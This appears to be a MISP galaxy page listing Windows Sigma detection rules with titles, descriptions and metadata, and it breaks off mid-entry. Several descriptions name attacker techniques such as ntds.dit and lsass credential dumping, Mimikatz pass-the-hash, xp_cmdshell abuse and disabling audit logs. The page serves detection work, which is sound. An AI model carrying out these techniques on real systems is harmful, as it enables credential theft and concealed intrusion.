Scanner PoC for CVE-2019-0708 RDP RCE Vuln

Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep

Internal MISP references

UUID 8400629e-79a9-4737-b387-5db940ab2367 which can be used as unique global reference for Scanner PoC for CVE-2019-0708 RDP RCE Vuln in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Adam Bradbury (idea)
creation_date 2019/06/02
falsepositive ['Unlikely']
filename win_security_rdp_bluekeep_poc_scanner.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

External Remote RDP Logon from Public IP

Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.

Internal MISP references

UUID 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 which can be used as unique global reference for External Remote RDP Logon from Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)
creation_date 2023/01/19
falsepositive ['Legitimate or intentional inbound connections from public IP addresses on the RDP port.']
filename win_security_successful_external_remote_rdp_login.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1133', 'attack.t1078', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Successful Overpass the Hash Attempt

Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.

Internal MISP references

UUID 192a0330-c20b-4356-90b6-7b7049ae0b87 which can be used as unique global reference for Successful Overpass the Hash Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Dominik Schaudel (rule)
creation_date 2018/02/12
falsepositive ['Runas command-line tool using /netonly parameter']
filename win_security_overpass_the_hash.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.s0002', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

A Member Was Added to a Security-Enabled Global Group

Detects activity when a member is added to a security-enabled global group

Internal MISP references

UUID c43c26be-2e87-46c7-8661-284588c5a53e which can be used as unique global reference for A Member Was Added to a Security-Enabled Global Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_member_added_security_enabled_global_group.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Admin User Remote Logon

Detect remote login by Administrator user (depending on internal pattern).

Internal MISP references

UUID 0f63e1ef-1eb9-4226-9d54-8927ca08520a which can be used as unique global reference for Admin User Remote Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2017/10/29
falsepositive ['Legitimate administrative activity.']
filename win_security_admin_rdp_login.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1078.001', 'attack.t1078.002', 'attack.t1078.003', 'car.2016-04-005']
Related clusters

To see the related clusters, click here.

Certificate Exported From Local Certificate Store

Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

Internal MISP references

UUID 58c0bff0-40a0-46e8-b5e8-b734b84d2017 which can be used as unique global reference for Certificate Exported From Local Certificate Store in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/13
falsepositive ['Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed']
filename win_certificateservicesclient_lifecycle_system_cert_exported.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

NTLM Brute Force

Detects common NTLM brute force device names

Internal MISP references

UUID 9c8acf1a-cbf9-4db6-b63c-74baabe03e59 which can be used as unique global reference for NTLM Brute Force in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jerry Shockley '@jsh0x'
creation_date 2022/02/02
falsepositive ['Systems with names equal to the spoofed ones used by the brute force tools']
filename win_susp_ntlm_brute_force.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

NTLM Logon

Detects logons using NTLM, which could be caused by a legacy source or attackers

Internal MISP references

UUID 98c3bcf1-56f2-49dc-9d8d-c66cf190238b which can be used as unique global reference for NTLM Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/08
falsepositive ['Legacy hosts']
filename win_susp_ntlm_auth.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Potential Remote Desktop Connection to Non-Domain Host

Detects logons using NTLM to hosts that are potentially not part of the domain.

Internal MISP references

UUID ce5678bb-b9aa-4fb5-be4b-e57f686256ad which can be used as unique global reference for Potential Remote Desktop Connection to Non-Domain Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton
creation_date 2020/05/22
falsepositive ['Host connections to valid domains, exclude these.', 'Host connections not using host FQDN.', 'Host connections to external legitimate domains.']
filename win_susp_ntlm_rdp.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Dump Ntds.dit To Suspicious Location

Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location

Internal MISP references

UUID 94dc4390-6b7c-4784-8ffc-335334404650 which can be used as unique global reference for Dump Ntds.dit To Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate backup operation/creating shadow copies']
filename win_esent_ntdsutil_abuse_susp_location.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

Ntdsutil Abuse

Detects potential abuse of ntdsutil to dump ntds.dit database

Internal MISP references

UUID e6e88853-5f20-4c4a-8d26-cd469fd8d31f which can be used as unique global reference for Ntdsutil Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate backup operation/creating shadow copies']
filename win_esent_ntdsutil_abuse.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Audit CVE Event

Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.

Internal MISP references

UUID 48d91a3a-2363-43ba-a456-ca71ac3da5c2 which can be used as unique global reference for Audit CVE Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Zach Mathis
creation_date 2020/01/15
falsepositive ['Unknown']
filename win_audit_cve.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1203', 'attack.privilege_escalation', 'attack.t1068', 'attack.defense_evasion', 'attack.t1211', 'attack.credential_access', 'attack.t1212', 'attack.lateral_movement', 'attack.t1210', 'attack.impact', 'attack.t1499.004']
Related clusters

To see the related clusters, click here.

Backup Catalog Deleted

Detects backup catalog deletions

Internal MISP references

UUID 9703792d-fd9a-456d-a672-ff92efe4806a which can be used as unique global reference for Backup Catalog Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)
creation_date 2017/05/12
falsepositive ['Unknown']
filename win_susp_backup_delete.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Microsoft Malware Protection Engine Crash - WER

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Internal MISP references

UUID 6c82cf5c-090d-4d57-9188-533577631108 which can be used as unique global reference for Microsoft Malware Protection Engine Crash - WER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/09
falsepositive ['MsMpEng might crash if the "C:\" partition is full']
filename win_application_msmpeng_crash_wer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1211', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Microsoft Malware Protection Engine Crash

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Internal MISP references

UUID 545a5da6-f103-4919-a519-e9aec1026ee4 which can be used as unique global reference for Microsoft Malware Protection Engine Crash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/09
falsepositive ['MsMpEng might crash if the "C:\" partition is full']
filename win_application_msmpeng_crash_error.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1211', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via WER - Application

Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential

Internal MISP references

UUID a18e0862-127b-43ca-be12-1a542c75c7c5 which can be used as unique global reference for Potential Credential Dumping Via WER - Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/07
falsepositive ['Rare legitimate crashing of the lsass process']
filename win_werfault_susp_lsass_credential_dump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Restricted Software Access By SRP

Detects restricted access to applications by the Software Restriction Policies (SRP) policy

Internal MISP references

UUID b4c8da4a-1c12-46b0-8a2b-0a8521d03442 which can be used as unique global reference for Restricted Software Access By SRP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/12
falsepositive ['Unknown']
filename win_software_restriction_policies_block.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1072']
Related clusters

To see the related clusters, click here.

Relevant Anti-Virus Signature Keywords In Application Log

Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

Internal MISP references

UUID 78bc5783-81d9-4d73-ac97-59f6db4f72a8 which can be used as unique global reference for Relevant Anti-Virus Signature Keywords In Application Log in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2017/02/19
falsepositive ['Some software piracy tools (key generators, cracks) are classified as hack tools']
filename win_av_relevant_match.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.resource_development', 'attack.t1588']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect File Transfer

Detects file being transferred via ScreenConnect RMM

Internal MISP references

UUID 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13 which can be used as unique global reference for Remote Access Tool - ScreenConnect File Transfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename win_app_remote_access_tools_screenconnect_file_transfer.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Command Execution

Detects command execution via ScreenConnect RMM

Internal MISP references

UUID 076ebe48-cc05-4d8f-9d41-89245cd93a14 which can be used as unique global reference for Remote Access Tool - ScreenConnect Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename win_app_remote_access_tools_screenconnect_command_exec.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Atera Agent Installation

Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators

Internal MISP references

UUID 87261fb2-69d0-42fe-b9de-88c6b5f65a43 which can be used as unique global reference for Atera Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/09/01
falsepositive ['Legitimate Atera agent installation']
filename win_software_atera_rmm_agent_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1219']
Related clusters

To see the related clusters, click here.

MSI Installation From Suspicious Locations

Detects MSI package installation from suspicious locations

Internal MISP references

UUID c7c8aa1c-5aff-408e-828b-998e3620b341 which can be used as unique global reference for MSI Installation From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.']
filename win_msi_install_from_susp_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSI Installation From Web

Detects installation of a remote msi file from web.

Internal MISP references

UUID 5594e67a-7f92-4a04-b65d-1a42fd824a60 which can be used as unique global reference for MSI Installation From Web in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stamatis Chatzimangou
creation_date 2022/10/23
falsepositive ['Unknown']
filename win_msi_install_from_web.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Application Uninstalled

An application has been removed. Check if it is critical.

Internal MISP references

UUID 570ae5ec-33dc-427c-b815-db86228ad43e which can be used as unique global reference for Application Uninstalled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename win_builtin_remove_application.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

MSSQL Server Failed Logon

Detects failed logon attempts from clients to MSSQL server.

Internal MISP references

UUID 218d2855-2bba-4f61-9c85-81d0ea63ac71 which can be used as unique global reference for MSSQL Server Failed Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), j4son
creation_date 2023/10/11
falsepositive ["This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them"]
filename win_mssql_failed_logon.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

MSSQL SPProcoption Set

Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started

Internal MISP references

UUID b3d57a5c-c92e-4b48-9a79-5f124b7cf964 which can be used as unique global reference for MSSQL SPProcoption Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ['Legitimate use of the feature by administrators (rare)']
filename win_mssql_sp_procoption_set.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

MSSQL XPCmdshell Option Change

Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed

Internal MISP references

UUID d08dd86f-681e-4a00-a92c-1db218754417 which can be used as unique global reference for MSSQL XPCmdshell Option Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Legitimate enable/disable of the setting', 'Note that since the event contain the change for both values. This means that this will trigger on both enable and disable']
filename win_mssql_xp_cmdshell_change.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSSQL Server Failed Logon From External Network

Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.

Internal MISP references

UUID ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d which can be used as unique global reference for MSSQL Server Failed Logon From External Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author j4son
creation_date 2023/10/11
falsepositive ['Unknown']
filename win_mssql_failed_logon_from_external_network.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

MSSQL XPCmdshell Suspicious Execution

Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands

Internal MISP references

UUID 7f103213-a04e-4d59-8261-213dddf22314 which can be used as unique global reference for MSSQL XPCmdshell Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unknown']
filename win_mssql_xp_cmdshell_audit_log.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSSQL Add Account To Sysadmin Role

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

Internal MISP references

UUID 08200f85-2678-463e-9c32-88dce2f073d1 which can be used as unique global reference for MSSQL Add Account To Sysadmin Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ['Rare legitimate administrative activity']
filename win_mssql_add_sysadmin_account.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

MSSQL Disable Audit Settings

Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server

Internal MISP references

UUID 350dfb37-3706-4cdc-9e2e-5e24bc3a46df which can be used as unique global reference for MSSQL Disable Audit Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ["This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up"]
filename win_mssql_disable_audit_settings.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Scheduled Task Executed Uncommon LOLBIN

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task

Internal MISP references

UUID f0767f15-0fb3-44b9-851e-e8d9a6d0005d which can be used as unique global reference for Scheduled Task Executed Uncommon LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule']
filename win_taskscheduler_lolbin_execution_via_task_scheduler.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Scheduled Task Executed From A Suspicious Location

Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task

Internal MISP references

UUID 424273ea-7cf8-43a6-b712-375f925e481f which can be used as unique global reference for Scheduled Task Executed From A Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_taskscheduler_execution_from_susp_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Important Scheduled Task Deleted

Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 9e3cb244-bdb8-4632-8c90-6079c8f4f16d which can be used as unique global reference for Important Scheduled Task Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename win_taskscheduler_susp_schtasks_delete.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

USB Device Plugged

Detects plugged/unplugged USB devices

Internal MISP references

UUID 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4 which can be used as unique global reference for USB Device Plugged in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/09
falsepositive ['Legitimate administrative activity']
filename win_usb_device_plugged.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1200']
Related clusters

To see the related clusters, click here.

Loading Diagcab Package From Remote Path

Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability

Internal MISP references

UUID 50cb47b8-2c33-4b23-a2e9-4600657d9746 which can be used as unique global reference for Loading Diagcab Package From Remote Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate package hosted on a known and authorized remote location']
filename win_diagnosis_scripted_load_remote_diagcab.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

CodeIntegrity - Revoked Image Loaded

Detects image load events with revoked certificates by code integrity.

Internal MISP references

UUID 881b7725-47cc-4055-8000-425823344c59 which can be used as unique global reference for CodeIntegrity - Revoked Image Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_image_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Blocked Image Load With Revoked Certificate

Detects blocked image load events with revoked certificates by code integrity.

Internal MISP references

UUID 6f156c48-3894-4952-baf0-16193e9067d2 which can be used as unique global reference for CodeIntegrity - Blocked Image Load With Revoked Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_image_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module

Detects loaded kernel modules that did not meet the WHQL signing requirements.

Internal MISP references

UUID 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f which can be used as unique global reference for CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_whql_failure.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unmet Signing Level Requirements By File Under Validation

Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.

Internal MISP references

UUID f8931561-97f5-4c46-907f-0a4a592e47a7 which can be used as unique global reference for CodeIntegrity - Unmet Signing Level Requirements By File Under Validation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule.']
filename win_codeintegrity_attempted_dll_load.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution']

CodeIntegrity - Unsigned Kernel Module Loaded

Detects the presence of a loaded unsigned kernel module on the system.

Internal MISP references

UUID 951f8d29-f2f6-48a7-859f-0673ff105e6f which can be used as unique global reference for CodeIntegrity - Unsigned Kernel Module Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_unsigned_driver_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unsigned Image Loaded

Detects loaded unsigned image on the system

Internal MISP references

UUID c92c24e7-f595-493f-9c98-53d5142f5c18 which can be used as unique global reference for CodeIntegrity - Unsigned Image Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_unsigned_image_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked

Detects block events for files that are disallowed by code integrity for protected processes

Internal MISP references

UUID 5daf11c3-022b-4969-adb9-365e6c078c7c which can be used as unique global reference for CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_blocked_protected_process_file.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Blocked Image/Driver Load For Policy Violation

Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.

Internal MISP references

UUID e4be5675-4a53-426a-8c81-a8bb2387e947 which can be used as unique global reference for CodeIntegrity - Blocked Image/Driver Load For Policy Violation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ['Unknown']
filename win_codeintegrity_enforced_policy_block.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

CodeIntegrity - Blocked Driver Load With Revoked Certificate

Detects blocked load attempts of revoked drivers

Internal MISP references

UUID 9b72b82d-f1c5-4632-b589-187159bc6ec1 which can be used as unique global reference for CodeIntegrity - Blocked Driver Load With Revoked Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unknown']
filename win_codeintegrity_revoked_driver_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

CodeIntegrity - Revoked Kernel Driver Loaded

Detects the load of a revoked kernel driver

Internal MISP references

UUID 320fccbf-5e32-4101-82b8-2679c5f007c6 which can be used as unique global reference for CodeIntegrity - Revoked Kernel Driver Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_driver_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Suspicious Rejected SMB Guest Logon From IP

Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service

Internal MISP references

UUID 71886b70-d7b4-4dbf-acce-87d2ca135262 which can be used as unique global reference for Suspicious Rejected SMB Guest Logon From IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w
creation_date 2021/06/30
falsepositive ['Account fallback reasons (after failed login with specific account)']
filename win_smbclient_security_susp_failed_guest_logon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.001']
Related clusters

To see the related clusters, click here.

Suspicious Application Installed

Detects suspicious application installed by looking at the added shortcut to the app resolver cache

Internal MISP references

UUID 83c161b6-ca67-4f33-8ad0-644a0737cf07 which can be used as unique global reference for Suspicious Application Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Packages or applications being legitimately used by users or administrators']
filename win_shell_core_susp_packages_installed.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

OpenSSH Server Listening On Socket

Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.

Internal MISP references

UUID 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781 which can be used as unique global reference for OpenSSH Server Listening On Socket in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author mdecrevoisier
creation_date 2022/10/25
falsepositive ['Legitimate administrator activity']
filename win_sshd_openssh_server_listening_on_socket.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

Standard User In High Privileged Group

Detect standard users login that are part of high privileged groups such as the Administrator group

Internal MISP references

UUID 7ac407cc-0f48-4328-aede-de1d2e6fef41 which can be used as unique global reference for Standard User In High Privileged Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Standard domain users who are part of the administrator group. These users shouldn\'t have these right. But in the case where it\'s necessary. They should be filtered out using the "TargetUserName" field']
filename win_lsa_server_normal_user_admin.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.privilege_escalation']

Sysinternals Tools AppX Versions Execution

Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths

Internal MISP references

UUID d29a20b2-be4b-4827-81f2-3d8a59eab5fc which can be used as unique global reference for Sysinternals Tools AppX Versions Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Legitimate usage of the applications from the Windows Store']
filename win_appmodel_runtime_sysinternals_tools_appx_execution.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Microsoft Defender Tamper Protection Trigger

Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"

Internal MISP references

